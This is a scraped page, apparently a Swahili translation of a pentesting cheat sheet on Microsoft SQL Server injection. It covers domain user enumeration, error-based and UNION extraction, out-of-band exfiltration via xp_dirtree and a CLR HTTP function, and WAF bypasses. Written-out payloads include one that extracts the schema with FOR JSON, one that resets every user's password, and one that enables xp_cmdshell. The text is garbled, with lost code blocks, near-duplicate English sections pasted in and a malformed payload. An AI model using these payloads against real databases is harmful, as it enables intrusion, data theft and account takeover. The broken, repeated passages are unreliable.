MSSQL Injection
MSSQL Injection
Uchunguzi wa Active Directory
Inawezekana kuchunguza watumiaji wa kikoa kupitia SQL injection ndani ya seva ya MSSQL kwa kutumia kazi za MSSQL zifuatazo:
SELECT DEFAULT_DOMAIN()
: Pata jina la kikoa cha sasa.master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator'))
: Ikiwa unajua jina la kikoa (DOMAIN katika mfano huu) kazi hii itarudisha SID ya mtumiaji Msimamizi katika muundo wa hex. Itaonekana kama0x01050000000[...]0000f401
, angalia jinsi baiti 4 za mwisho ni nambari 500 katika muundo wa big endian, ambayo ni ID ya kawaida ya mtumiaji msimamizi. Kazi hii itakuruhusu kujua ID ya kikoa (baiti zote isipokuwa za mwisho 4).SUSER_SNAME(0x01050000000[...]0000e803)
: Kazi hii itarudisha jina la mtumiaji wa ID iliyotajwa (ikiwapo ipo), katika kesi hii 0000e803 katika muundo wa big endian == 1000 (kawaida hii ni ID ya mtumiaji wa kawaida wa kwanza aliyeanzishwa). Kisha unaweza kufikiria kwamba unaweza kudukua ID za watumiaji kutoka 1000 hadi 2000 na labda kupata majina ya watumiaji wote wa kikoa. Kwa mfano, kwa kutumia kazi kama ifuatayo:
Njia mbadala za Kosa la Makosa kwa Kuzingatia Hitilafu
Kawaida, kosa-msingi la SQL linajumuisha ujenzi kama +AND+1=@@version--
na mabadiliko yanayotegemea operator wa «OR». Maswali yanayojumuisha mifano kama hizo kawaida huzuiliwa na WAFs. Kwa kuzidisha, unaweza kuunganisha herufi kwa kutumia herufi%2b na matokeo ya wito wa kazi maalum ambazo husababisha kosa la ubadilishaji wa aina ya data inayotafutwa.
Baadhi ya mifano ya kazi hizo ni:
SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()
Mfano wa matumizi ya kazi ya USER_NAME()
:
SSRF
Mbinu hizi za SSRF zilichukuliwa kutoka hapa
fn_xe_file_target_read_file
fn_xe_file_target_read_file
Inahitaji ruhusa ya VIEW SERVER STATE
kwenye seva.
fn_get_audit_file
fn_get_audit_file
Inahitaji ruhusa ya CONTROL SERVER
.
fn_trace_gettabe
fn_trace_gettabe
Inahitaji ruhusa ya CONTROL SERVER
.
xp_dirtree
, xp_fileexists
, xp_subdirs
xp_dirtree
, xp_fileexists
, xp_subdirs
Taratibu zilizohifadhiwa kama xp_dirtree
, ingawa hazijadhibitishwa rasmi na Microsoft, zimeelezewa na wengine mtandaoni kutokana na umuhimu wao katika shughuli za mtandao ndani ya MSSQL. Taratibu hizi mara nyingi hutumiwa katika kuvuja data nje ya mfumo (Out of Band Data exfiltration), kama inavyoonyeshwa katika mifano mbalimbali na machapisho.
Kwa mfano, taratibu iliyohifadhiwa ya xp_dirtree
hutumiwa kufanya maombi ya mtandao, lakini ina kiwango cha kikomo cha bandari ya TCP 445 tu. Nambari ya bandari haiwezi kubadilishwa, lakini inaruhusu kusoma kutoka kwa sehemu za mtandao. Matumizi yake yanaonyeshwa katika hati ya SQL ifuatayo:
Ni muhimu kuelewa kuwa njia hii huenda isifanye kazi kwenye mazingira yote ya mfumo, kama vile kwenye Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
inayofanya kazi kwenye Windows Server 2016 Datacenter
na mipangilio ya msingi.
Kwa kuongezea, kuna taratibu zingine zilizohifadhiwa kama master..xp_fileexist
na xp_subdirs
ambazo zinaweza kufikia matokeo sawa. Maelezo zaidi kuhusu xp_fileexist
yanaweza kupatikana kwenye makala ya TechNet hii.
xp_cmdshell
xp_cmdshell
Kwa wazi, unaweza pia kutumia xp_cmdshell
kutekeleza kitu kinachosababisha SSRF. Kwa maelezo zaidi, soma sehemu inayofaa kwenye ukurasa huu:
MSSQL User Defined Function - SQLHttp
Kuunda CLR UDF (Common Language Runtime User Defined Function), ambayo ni namna ya kanuni iliyoandikwa kwa lugha yoyote ya .NET na kusanidiwa kama DLL, ili kupakia ndani ya MSSQL kwa ajili ya kutekeleza kazi za desturi, ni mchakato ambao unahitaji ufikiaji wa dbo
. Hii inamaanisha kuwa kawaida inawezekana tu wakati uhusiano wa database unafanywa kama sa
au na jukumu la Msimamizi.
Mradi wa Visual Studio na maelekezo ya usanidi yanapatikana kwenye hifadhidata ya Github hii ili kurahisisha upakiaji wa faili ya binary ndani ya MSSQL kama mkusanyiko wa CLR, hivyo kuruhusu utekelezaji wa maombi ya HTTP GET ndani ya MSSQL.
Muhimu wa utendaji huu umefungwa kwenye faili ya http.cs
, ambayo inatumia darasa la WebClient
kutekeleza ombi la GET na kupata maudhui kama inavyoonyeshwa hapa chini:
Kabla ya kutekeleza amri ya SQL ya CREATE ASSEMBLY
, inashauriwa kukimbia sehemu ifuatayo ya SQL ili kuongeza hash ya SHA512 ya mkusanyiko kwenye orodha ya mkusanyiko ulioaminika wa seva (inayoonekana kupitia select * from sys.trusted_assemblies;
):
Baada ya kufanikiwa kuongeza mkusanyiko na kuunda kazi, kanuni ya SQL ifuatayo inaweza kutumika kufanya maombi ya HTTP:
Udanganyifu wa Haraka: Kupata Yaliyomo Yote ya Jedwali kwa Kauli Moja
Njia fupi ya kuchukua yaliyomo kamili ya jedwali kwa kauli moja inahusisha kutumia kifungu cha FOR JSON
. Njia hii ni rahisi zaidi kuliko kutumia kifungu cha FOR XML
, ambacho kinahitaji hali maalum kama "raw". Kifungu cha FOR JSON
kinapendelewa kwa sababu ya ufasaha wake.
Hapa ni jinsi ya kupata muundo, jedwali, na nguzo kutoka kwenye database ya sasa:
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
Retrieving the Current Query
For users granted the VIEW SERVER STATE
permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
To check if you have the VIEW SERVER STATE permission, the following query can be used:
Tafsiri:
MSSQL Injection
Introduction
MSSQL Injection is a technique used to exploit vulnerabilities in web applications that use Microsoft SQL Server as their database management system. By injecting malicious SQL queries into user input fields, an attacker can manipulate the application's database and potentially gain unauthorized access to sensitive information.
Exploiting MSSQL Injection
To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the target web application. These are typically user input fields such as search boxes, login forms, or URL parameters.
Once a vulnerable input field is identified, the attacker can inject SQL queries to manipulate the application's database. The goal is to craft a malicious query that will be executed by the database server, allowing the attacker to extract or modify data.
Example
Consider the following URL:
In this example, the id
parameter is vulnerable to MSSQL Injection. The attacker has injected a UNION SELECT statement to retrieve the version of the MSSQL server.
Protection and Prevention
To protect against MSSQL Injection attacks, it is important to implement proper input validation and sanitization techniques. This includes validating user input, using parameterized queries or prepared statements, and applying strict input filtering.
Regular security assessments and penetration testing can also help identify and mitigate potential vulnerabilities in web applications.
Conclusion
MSSQL Injection is a serious security vulnerability that can lead to unauthorized access and data leakage in web applications. By understanding the techniques used by attackers and implementing proper security measures, organizations can protect their applications and data from these types of attacks.
MSSQL Injection
Introduction
MSSQL Injection is a technique used to exploit vulnerabilities in web applications that use Microsoft SQL Server as their database management system. By injecting malicious SQL queries into user input fields, an attacker can manipulate the application's database and potentially gain unauthorized access to sensitive information.
Union-Based MSSQL Injection
One common method of MSSQL Injection is the Union-Based technique. This technique involves using the UNION operator to combine the results of two or more SELECT statements into a single result set. By carefully crafting the injected SQL query, an attacker can retrieve data from the database that they are not authorized to access.
Exploiting MSSQL Injection
To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the target web application. These input fields are typically used to construct SQL queries that retrieve data from the database.
Once a vulnerable input field is identified, the attacker can inject a malicious SQL query to exploit the vulnerability. In the case of Union-Based MSSQL Injection, the attacker can use the UNION operator to combine their own SELECT statement with the original query.
For example, consider the following vulnerable URL:
In this example, the attacker is injecting the SQL query union select null,@@version,null
into the id
parameter. The @@version
function is used to retrieve the version of the MSSQL Server.
Another example:
In this example, the attacker is injecting the SQL query union select null,@@version,null
into the id
parameter. The 0x
prefix is used to indicate that the following value is in hexadecimal format.
By analyzing the response from the server, the attacker can determine if the injection was successful and extract the desired information.
Prevention
To prevent MSSQL Injection attacks, it is important to implement proper input validation and sanitization techniques. This includes validating and filtering user input to ensure that it does not contain any malicious SQL code.
Additionally, using parameterized queries or prepared statements can help protect against SQL injection attacks by separating the SQL code from the user input.
Regularly updating and patching the MSSQL Server can also help mitigate the risk of MSSQL Injection vulnerabilities.
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
MSSQL Injection
Description
MSSQL Injection is a technique used to exploit vulnerabilities in web applications that use Microsoft SQL Server as their database management system. By injecting malicious SQL queries into user input fields, an attacker can manipulate the application's database and potentially gain unauthorized access to sensitive information.
Exploiting the Vulnerability
To exploit the MSSQL Injection vulnerability, an attacker can use the following payload:
In the provided URL, the payload is injected into the id
parameter of the getItem
endpoint. The union select
statement is used to combine the result of the original query with the injected query. In this case, the injected query retrieves the version of the MSSQL server.
Prevention
To prevent MSSQL Injection attacks, it is important to implement proper input validation and sanitization techniques. This includes using parameterized queries or prepared statements, which ensure that user input is treated as data rather than executable code. Additionally, keeping the MSSQL server and web application up to date with the latest security patches can help mitigate the risk of exploitation.
MSSQL Injection
Introduction
MSSQL Injection is a technique used to exploit vulnerabilities in web applications that use Microsoft SQL Server as their database management system. By injecting malicious SQL queries into user input fields, an attacker can manipulate the application's database and potentially gain unauthorized access to sensitive information.
Exploiting MSSQL Injection
To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the target web application. These input fields are typically used to construct SQL queries that interact with the database. By injecting specially crafted SQL statements, an attacker can manipulate the behavior of these queries and extract or modify data.
Example
Consider the following URL:
In this example, the id
parameter is vulnerable to MSSQL Injection. The attacker appends a malicious SQL statement after the id
value to manipulate the database query.
The injected SQL statement 0xunion+select\Nnull,@@version,null+from+users--
performs a UNION-based SQL Injection attack. It selects the @@version
system variable, which reveals the version of the MSSQL Server, from the users
table.
Prevention
To prevent MSSQL Injection attacks, it is crucial to implement proper input validation and parameterized queries. Input validation ensures that user-supplied data is sanitized and conforms to expected formats. Parameterized queries separate SQL code from user input, preventing malicious SQL statements from being executed.
Additionally, keeping the MSSQL Server and web application up to date with the latest security patches helps mitigate potential vulnerabilities.
Conclusion
MSSQL Injection is a serious security risk that can lead to unauthorized access and data leakage. By understanding the techniques used by attackers and implementing proper security measures, web applications can be protected against these types of attacks.
So for example, multiple queries such as:
Kuongeza exec() isiyo na maana mwishoni na kufanya WAF iamini kuwa hii sio swali halali
admina'union select 1,'admin','testtest123'exec('select 1')--
Hii itakuwa:
SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123' exec('select 1')--'
Kutumia swali zisizo za kawaida
admin'exec('update[users]set[password]=''a''')--
Hii itakuwa:
SELECT id, username, password FROM users WHERE username = 'admin' exec('update[users]set[password]=''a''')--'
Au kuwezesha xp_cmdshell
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
Hii itakuwa
select * from users where username = ' admin' exec('sp_configure''show advanced option'',''1''reconfigure') exec('sp_configure''xp_cmdshell'',''1''reconfigure')--'
Last updated